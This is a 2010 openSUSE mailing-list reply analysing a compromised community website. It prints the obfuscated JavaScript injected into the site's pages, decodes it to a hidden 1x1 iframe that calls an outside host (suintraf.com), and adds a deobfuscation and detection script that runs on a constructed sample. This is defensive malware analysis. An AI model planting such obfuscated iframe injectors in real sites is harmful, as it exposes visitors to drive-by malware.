Mailinglist Archive: opensuse-project (465 mails)

Re: [opensuse-project] openuse-community.org is a bad website
  • From: David Haller <dnh@xxxxxxxxxxxx>
  • Date: Fri, 2 Jul 2010 01:06:06 +0200
  • Message-id: <20100701230606.GA7231@xxxxxxxxxxxxxxxxxx>
Hello,

On Thu, 01 Jul 2010, Marcus Meissner wrote:
> On Thu, Jul 01, 2010 at 06:35:44PM +0200, Cristian Morales Vega wrote:
>> 2010/7/1 Andrea Florio <andrea@xxxxxxxxxxxx>:
>>> According to firefox/google, opensuse-community.org is a bad website...
>>> anything we can do??
>>
>> The FAQ explains how it works: http://www.stopbadware.org/home/faq
>>
>> But it's my understanding that it has already been reported:
>> http://www.stopbadware.org/reports/8e9ba36718d9116809d178a7057d0f47
>
> curl http://opensuse-community.org/Welcome_to_openSUSE-Community.org|less
>
> The very first line looks truly like malware:
>
> script language=JavaScript document.write(unescape('%3c'+'%73cri%70t
> language=Java%53cript%3edo'+'cu%6d%65n%74.write%28unesca%70%65%28%27%253c%69frame%25%320w%27+%27i%25%364%27+'+'%27%74h=1%20he%25%369g%27+%27%68t%253d1
> %62%256f'+'%2572d%256'+'5r=%27+%270 %256%36%72amebo%2572'+'der%253%640
> %257%33%2572c=%2527h%257%34%74%27+%27p:%252%66%2f%73uin'+'%2574%25%372a%256%36.co%256d/top%25310'+'%25%330/in%2e%63g%69%3f%34%2527%25%33e%253c%2f%256%39%66ram%256%35%253%65%27%29%29%3c/s'+'%63ript%3e'))

So it seems at a deeper look.

$ jsshell
js> unescape('%3c'+'%73cri%70t
language=Java%53cript%3edo'+'cu%6d%65n%74.write%28unesca%70%65%28%27%253c%69frame%25%320w%27+%27i%25%364%27+'+'%27%74h=1%20he%25%369g%27+%27%68t%253d1
%62%256f'+'%2572d%256'+'5r=%27+%270 %256%36%72amebo%2572'+'der%253%640
%257%33%2572c=%2527h%257%34%74%27+%27p:%252%66%2f%73uin'+'%2574%25%372a%256%36.co%256d/top%25310'+'%25%330/in%2e%63g%69%3f%34%2527%25%33e%253c%2f%256%39%66ram%256%35%253%65%27%29%29%3c/s'+'%63ript%3e')
<script
language=JavaScript>document.write(unescape('%3ciframe%20w'+'i%64'+'th=1
he%69g'+'ht%3d1 b%6f%72d%65r='+'0 %66ramebo%72der%3d0
%73%72c=%27h%74t'+'p:%2f/suin%74%72a%66.co%6d/top%310%30/in.cgi?4%27%3e%3c/%69fram%65%3e'))</script>
js> unescape('%3ciframe%20w'+'i%64'+'th=1 he%69g'+'ht%3d1 b%6f%72d%65r='+'0
%66ramebo%72der%3d0
%73%72c=%27h%74t'+'p:%2f/suin%74%72a%66.co%6d/top%310%30/in.cgi?4%27%3e%3c/%69fram%65%3e')
<iframe width=1 height=1 border=0 frameborder=0
src='http://suintraf.com/top100/in.cgi?4'></iframe>
js>

So, it "injects" an "invisible" 1x1 iframe. The weird stuff is:
http://suintraf.com/top100/in.cgi?4 redirects to linux.com, if you
call it as a linux browser.

But if you call it as e.g. an ie6, you get redirected to
http://www.google.com/errors/asfe/system_down.html

So, I guess depending on which browser you use (and whatever else) you
could get redirected to a site where malware is, trying to be
installed as drive-by-download or whatever.

Anyway, JavaScript unescape orgies are always a bad sign. Please, tell
the admins to reinstall from a clean source / backups. And webpin's
index has been broken for quite a while anyway.

-dnh

PS: jsshell is part of libjs, no idea if oS/packman package it.

--
[Stefan Wegmann is looking for a visually appealing CD-burning program] Hmmmm,
I hadn't looked at the whole thing from that angle yet. What would suit your
refined aesthetic tastes, then? A delicate chartreuse in slightly fluffy
contrast to a spring-like Easter-egg-yolk yellow? With buttons in a floral
design and chiffon-like help windows with an airy, translucent look?
[Thomas Templin in suse-linux]
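
The manual jsshell steps in the message above, done as static text processing so that nothing from the page is ever evaluated. This is an added example, not part of the original mail: the sample payload and its host `t.example.invalid` are constructed, and the function names are illustrative.

```javascript
// Constructed sample (not the payload from the mail): same shape, two nested
// unescape() layers with split string literals; the host is a placeholder.
const SAMPLE =
  "<script>document.write(unescape('%3cscr'+'ipt%3edocument.write(unescape(" +
  "%27%253ciframe wi%27+%27dth=1 height=1 src=%2527http://t.example.invalid/" +
  "in.cgi?4%2527%253e%253c/iframe%253e%27))%3c/script%3e'))</script>";

// unescape( 'lit' + 'lit' ... ) whose argument is only single-quoted literals.
const CALL = /unescape\(\s*((?:'[^']*'\s*\+?\s*)+)\)/;

// One pass of %XX decoding, like unescape() for %XX (no %uXXXX handling).
function pctDecode(s) {
  return s.replace(/%([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Peel layers as text only; nothing from the input is ever evaluated.
function peel(src, maxLayers = 8) {
  const layers = [];
  let cur = src;
  for (let i = 0; i < maxLayers; i++) {
    const m = CALL.exec(cur);
    if (!m) break;
    cur = pctDecode(m[1].match(/'[^']*'/g).map(q => q.slice(1, -1)).join(''));
    layers.push(cur);
  }
  return layers;
}

// Report iframes sized 1x1 or smaller, the "invisible" pattern from the mail.
function hiddenIframes(html) {
  const found = [];
  for (const m of html.matchAll(/<iframe\b([^>]*)>/gi)) {
    const attr = n =>
      (new RegExp('\\b' + n + "\\s*=\\s*['\"]?([^'\"\\s>]+)", 'i').exec(m[1]) || [])[1];
    const width = Number(attr('width')), height = Number(attr('height'));
    if (width <= 1 && height <= 1) found.push({ src: attr('src'), width, height });
  }
  return found;
}

function analyze(src) {
  const layers = peel(src);
  const last = layers.length ? layers[layers.length - 1] : src;
  return { depth: layers.length, iframes: hiddenIframes(last) };
}

console.log(JSON.stringify(analyze(SAMPLE)));
```

The layer count is itself a useful signal: a page that needs more than one decoding pass before any markup appears matches the nested-unescape pattern the mail calls a bad sign.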